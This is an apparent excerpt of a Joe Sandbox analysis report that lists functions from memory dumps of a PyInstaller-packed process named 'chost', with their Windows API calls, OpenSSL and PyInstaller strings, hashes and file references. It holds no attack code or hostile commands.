Instruction ID: 2a97268512bfaf2d059741164101f6cd58dcd7a04aec08e1a2b3060a249fb21d
Opcode Fuzzy Hash: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
Instruction Fuzzy Hash: 9221A432B08B8086D3549B22A950B6AB2A9FB84B84F144035EB9D03FA9CF7CD551CB00

Function 00007FFDF6A41DF7 Relevance: 1.3, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFDF6A9F1C3

Memory Dump Source

Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true

Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 9e1f5a9259e0aa48b60180f011c1c6fd63c9391dcfad61ef29b2cdf2ae2c5ec5
Instruction ID: 05ff750ffb15b08f955c4d251aef55e950e072ec10663f59e3933ef17774da3a
Opcode Fuzzy Hash: 9e1f5a9259e0aa48b60180f011c1c6fd63c9391dcfad61ef29b2cdf2ae2c5ec5
Instruction Fuzzy Hash: 02218132F0924285FB646A35A861A7932E8FF41B48F344531D92D47EDDCE3CE851C751

Function 00007FFDF6A4204A Relevance: 1.3, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFDF6A4F39B

Memory Dump Source

Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true

Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 853e6436f94aa431da519847a64e922f1c6e95587a9ca09828f1910c0d29a45c
Instruction ID: ad3b97ef0ffcf3f427cc4f84646c10cf90d13f87f88beb95b8ec187ae0eb7c58
Opcode Fuzzy Hash: 853e6436f94aa431da519847a64e922f1c6e95587a9ca09828f1910c0d29a45c
Instruction Fuzzy Hash: DFF0EC22B08B8185E7059B26F8106AAB668FB85FC4F584035EE9D47FA9CE7CDA518604

Function 00007FF69437D66C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF694370D00,?,?,?,00007FF69437236A,?,?,?,?,?,00007FF694373B59), ref: 00007FF69437D6AA

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction ID: c4e8d760e671bee1265a566b8a3fe97f7fe7e1bef0c549d29f9bc483c7ea1201
Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction Fuzzy Hash: 28F03420A2D30284FE74667358D12B95290CF94BA0F8882B8D8AEC53C2EE2CB480C620

Non-executed Functions

Function 00007FF694368BD0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF694369400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6943645E4,00000000,00007FF694361985), ref: 00007FF694369439

SetConsoleCtrlHandler.KERNEL32(?,?,FFFFFFFF,00007FF694363F7F), ref: 00007FF694368C2B
GetStartupInfoW.KERNEL32(?,FFFFFFFF,00007FF694363F7F), ref: 00007FF694368C46

Part of subcall function 00007FF69437A4EC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69437A500

Part of subcall function 00007FF69437878C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6943787F3

GetCommandLineW.KERNEL32(?,FFFFFFFF,00007FF694363F7F), ref: 00007FF694368CD6
CreateProcessW.KERNEL32 ref: 00007FF694368D0E
GetLastError.KERNEL32(?,FFFFFFFF,00007FF694363F7F), ref: 00007FF694368D18

Part of subcall function 00007FF694362C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF694363706,?,00007FF694363804), ref: 00007FF694362C9E
Part of subcall function 00007FF694362C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF694363706,?,00007FF694363804), ref: 00007FF694362D63
Part of subcall function 00007FF694362C50: MessageBoxW.USER32 ref: 00007FF694362D99

RegisterClassW.USER32 ref: 00007FF694368D70
GetLastError.KERNEL32(?,FFFFFFFF,00007FF694363F7F), ref: 00007FF694368D7B
CreateWindowExW.USER32 ref: 00007FF694368DC5
GetLastError.KERNEL32(?,FFFFFFFF,00007FF694363F7F), ref: 00007FF694368DD7
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF694363F7F), ref: 00007FF694368DF2
GetLastError.KERNEL32(?,FFFFFFFF,00007FF694363F7F), ref: 00007FF694368E05
PeekMessageW.USER32 ref: 00007FF694368E29
TranslateMessage.USER32 ref: 00007FF694368E37
DispatchMessageW.USER32(?,FFFFFFFF,00007FF694363F7F), ref: 00007FF694368E41
PeekMessageW.USER32 ref: 00007FF694368E5C
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF694363F7F), ref: 00007FF694368E6E
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF694363F7F), ref: 00007FF694368E89
TerminateProcess.KERNEL32(?,FFFFFFFF,00007FF694363F7F), ref: 00007FF694368E9F
GetLastError.KERNEL32(?,FFFFFFFF,00007FF694363F7F), ref: 00007FF694368EA9
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF694363F7F), ref: 00007FF694368EB7
DestroyWindow.USER32(?,FFFFFFFF,00007FF694363F7F), ref: 00007FF694368FF4
GetExitCodeProcess.KERNEL32 ref: 00007FF694369009
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF694363F7F), ref: 00007FF694369012
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF694363F7F), ref: 00007FF69436901F

Strings

PyInstallerOnefileHiddenWindow, xrefs: 00007FF694368D44
Failed to create child process!, xrefs: 00007FF694368D20
CreateProcessW, xrefs: 00007FF694368D27
PyInstaller Onefile Hidden Window, xrefs: 00007FF694368D85

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
API String ID: 3832162212-3165540532
Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction ID: 2f78c17e8f6663816fc82164a7c7165028fca91e9fed9c9ce818c0f85e2fa460
Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction Fuzzy Hash: 12D17231A09A8386E7208F36E8952AD7760FF84B58F508279EA5DC7BA9DF3CD145C700

Function 00007FFDEAE43028 Relevance: 13.6, APIs: 9, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFDEAE43044
00007FFE0E141730.VCRUNTIME140 ref: 00007FFDEAE43068
RtlCaptureContext.KERNEL32 ref: 00007FFDEAE43071
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFDEAE4308B
RtlVirtualUnwind.KERNEL32 ref: 00007FFDEAE430CC
00007FFE0E141730.VCRUNTIME140 ref: 00007FFDEAE430FF
IsDebuggerPresent.KERNEL32 ref: 00007FFDEAE43120
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFDEAE4313D
UnhandledExceptionFilter.KERNEL32 ref: 00007FFDEAE43148

Memory Dump Source

Source File: 00000011.00000002.2378252189.00007FFDEAE41000.00000040.00000001.01000000.00000022.sdmp, Offset: 00007FFDEAE40000, based on PE: true

Associated: 00000011.00000002.2378210021.00007FFDEAE40000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378252189.00007FFDEAEA2000.00000040.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378252189.00007FFDEAEEE000.00000040.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378252189.00007FFDEAEF2000.00000040.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378252189.00007FFDEAEF7000.00000040.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378252189.00007FFDEAF4F000.00000040.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378252189.00007FFDEAF54000.00000040.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378252189.00007FFDEAF57000.00000040.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378628612.00007FFDEAF58000.00000080.00000001.01000000.00000022.sdmpDownload File
Associated: 00000011.00000002.2378672916.00007FFDEAF59000.00000004.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdeae40000_chost.jbxd

Similarity

API ID: 00007E141730ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 2670129840-0
Opcode ID: 077b0f214cb87451efc13930c849abf149ec882450af492fe5d50a1ac414abff
Instruction ID: a843cef89d87b8f7ad0d2ad00116473117a151218120ec5600c6a7747a3c0388
Opcode Fuzzy Hash: 077b0f214cb87451efc13930c849abf149ec882450af492fe5d50a1ac414abff
Instruction Fuzzy Hash: 10316D76708B838AEB689F60E8603E93768FB84B44F44403ADA8D47B95DF39C548C711

Function 00007FF6943683B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00007FF694368B09,00007FF694363FA5), ref: 00007FF69436841B
RemoveDirectoryW.KERNEL32(?,00007FF694368B09,00007FF694363FA5), ref: 00007FF69436849E
DeleteFileW.KERNEL32(?,00007FF694368B09,00007FF694363FA5), ref: 00007FF6943684BD
FindNextFileW.KERNEL32(?,00007FF694368B09,00007FF694363FA5), ref: 00007FF6943684CB
FindClose.KERNEL32(?,00007FF694368B09,00007FF694363FA5), ref: 00007FF6943684DC
RemoveDirectoryW.KERNEL32(?,00007FF694368B09,00007FF694363FA5), ref: 00007FF6943684E5

Strings

%s\*, xrefs: 00007FF6943683E2

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction ID: f54adb1723f03b9f80fca2c002b245018af0083a498a69ff525712df6ff72109
Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction Fuzzy Hash: 9341B221A0D94381EA359B36E4C52B97360FB98758F90837AE99DC36D8DF3CD54AC700

Function 00007FFDF6A4212B Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFDF6ABF3A0
RtlCaptureContext.KERNEL32 ref: 00007FFDF6ABF3CD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFDF6ABF3E7
RtlVirtualUnwind.KERNEL32 ref: 00007FFDF6ABF428
IsDebuggerPresent.KERNEL32 ref: 00007FFDF6ABF47C
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFDF6ABF499
UnhandledExceptionFilter.KERNEL32 ref: 00007FFDF6ABF4A4

Memory Dump Source

Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true

Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 42b55a9a064fc9b9eecda881d5f6a8203af3c995eb229b08bbbd6dd66c50bcf0
Instruction ID: e31b143263c36518f438ea679bbcec1f8fbcd3c7484a44a0262f625091ebbd38
Opcode Fuzzy Hash: 42b55a9a064fc9b9eecda881d5f6a8203af3c995eb229b08bbbd6dd66c50bcf0
Instruction Fuzzy Hash: A1310876709B8186EB608F60E860BAD7368FB88744F44403ADA5E47B99DF7CD648C710

Function 00007FF69436D19C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF69436D1B8
RtlCaptureContext.KERNEL32 ref: 00007FF69436D1E5
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF69436D1FF
RtlVirtualUnwind.KERNEL32 ref: 00007FF69436D240
IsDebuggerPresent.KERNEL32 ref: 00007FF69436D294
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF69436D2B1
UnhandledExceptionFilter.KERNEL32 ref: 00007FF69436D2BC

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction ID: d8c6b062e9219d83e5a2ee686fc4abe43069d8fed9d9821c92c2b84464b22ee0
Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction Fuzzy Hash: A9313272619B8285EB709F61E8807EE7364FB84744F448439DA4E87B99EF7CD548C710

Function 00007FF69437A684 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF69437A6FD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF69437A715
RtlVirtualUnwind.KERNEL32 ref: 00007FF69437A750
IsDebuggerPresent.KERNEL32 ref: 00007FF69437A789
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF69437A793
UnhandledExceptionFilter.KERNEL32 ref: 00007FF69437A79E

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction ID: 6dbc73b780dc91aa7294d30e8da47bf6571c999bc8b6125a66cbdcfa3ba5e67d
Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction Fuzzy Hash: 83317432618B8285D770DF36E8802AE73A4FB88754F544139EA9D87B55DF3CD145CB00

Function 00007FFDF6A41CBC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 292COMMON

Download Yara Rule

Strings

tls_construct_new_session_ticket, xrefs: 00007FFDF6AB6DCD, 00007FFDF6AB6E7E, 00007FFDF6AB7009, 00007FFDF6AB7083
..\s\ssl\statem\statem_srvr.c, xrefs: 00007FFDF6AB6DD9, 00007FFDF6AB6E8A, 00007FFDF6AB6FA3, 00007FFDF6AB6FC3, 00007FFDF6AB7015, 00007FFDF6AB708F, 00007FFDF6AB7167
resumption, xrefs: 00007FFDF6AB6EC3
construct_stateful_ticket, xrefs: 00007FFDF6AB715B

Memory Dump Source

Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true

Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd

Similarity

API ID:
String ID: ..\s\ssl\statem\statem_srvr.c$construct_stateful_ticket$resumption$tls_construct_new_session_ticket
API String ID: 0-1194634662
Opcode ID: dec3abec53ea88dd23b96ea7d6e0bf55a5ec65c0cc74eefb8bf854ade513a757
Instruction ID: 05e9a52907f3fe2dc226ef67f53f3fa6e228c483ce2d8ba0ebc02072d24abee7
Opcode Fuzzy Hash: dec3abec53ea88dd23b96ea7d6e0bf55a5ec65c0cc74eefb8bf854ade513a757
Instruction Fuzzy Hash: 61D16D21B0968281EB509B65D860BB97798FB85B84F484036EE6C4BFEECF7DE541C710

Function 00007FF6943818E4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF694381930
FindFirstFileExW.KERNEL32 ref: 00007FF694381A3A

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
Instruction ID: 372393b69a4ec3f3c56b15206987a8cba900712ea79a1b66b452bf340369e673
Opcode Fuzzy Hash: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
Instruction Fuzzy Hash: 64B1B722B1C68681EE719B73D4801B9A3A1EB95BE4F449179E99DC7B89EF3CE441C700

Function 00007FFDF6A41EE2 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 470COMMON

Download Yara Rule

APIs

00007FFE1FFB08A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFDF6A9CCF4

Strings

tls_parse_ctos_psk, xrefs: 00007FFDF6A9CE7A, 00007FFDF6A9CECD, 00007FFDF6A9CFFB, 00007FFDF6A9D0D6, 00007FFDF6A9D135
D:\a\1\s\include\internal/packet.h, xrefs: 00007FFDF6A9CAE9, 00007FFDF6A9CAFD
..\s\ssl\statem\extensions_srvr.c, xrefs: 00007FFDF6A9CB37, 00007FFDF6A9CE86, 00007FFDF6A9CED4, 00007FFDF6A9D002, 00007FFDF6A9D0DD, 00007FFDF6A9D13C

Memory Dump Source

Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true

Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd

Similarity

API ID: 00007
String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_psk
API String ID: 3568877910-3130753023
Opcode ID: 5dc7fcbe69d8e434889cc8963c8387381130f446ff2a30149aa795b244e427f1
Instruction ID: c54e714ab13bc27deea76108db65581f36586b2376d43d7187def7530c942bfc
Opcode Fuzzy Hash: 5dc7fcbe69d8e434889cc8963c8387381130f446ff2a30149aa795b244e427f1
Instruction Fuzzy Hash: 4F12B262B08A8241FB14AB65D461ABDB7A8FB81788F504131DE6E47FDEDF7CE5418700

Function 00007FFDF6A424DC Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 329COMMON

Download Yara Rule

APIs

00007FFE1FFB08A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFDF6A93366

Strings

tls_construct_ctos_psk, xrefs: 00007FFDF6A93302, 00007FFDF6A93476, 00007FFDF6A934E2, 00007FFDF6A9352A, 00007FFDF6A93736, 00007FFDF6A93774, 00007FFDF6A937AB
..\s\ssl\statem\extensions_clnt.c, xrefs: 00007FFDF6A9330E, 00007FFDF6A93482, 00007FFDF6A934EE, 00007FFDF6A93536, 00007FFDF6A93742, 00007FFDF6A93780, 00007FFDF6A937B7

Memory Dump Source

Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true

Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd

Similarity

API ID: 00007
String ID: ..\s\ssl\statem\extensions_clnt.c$tls_construct_ctos_psk
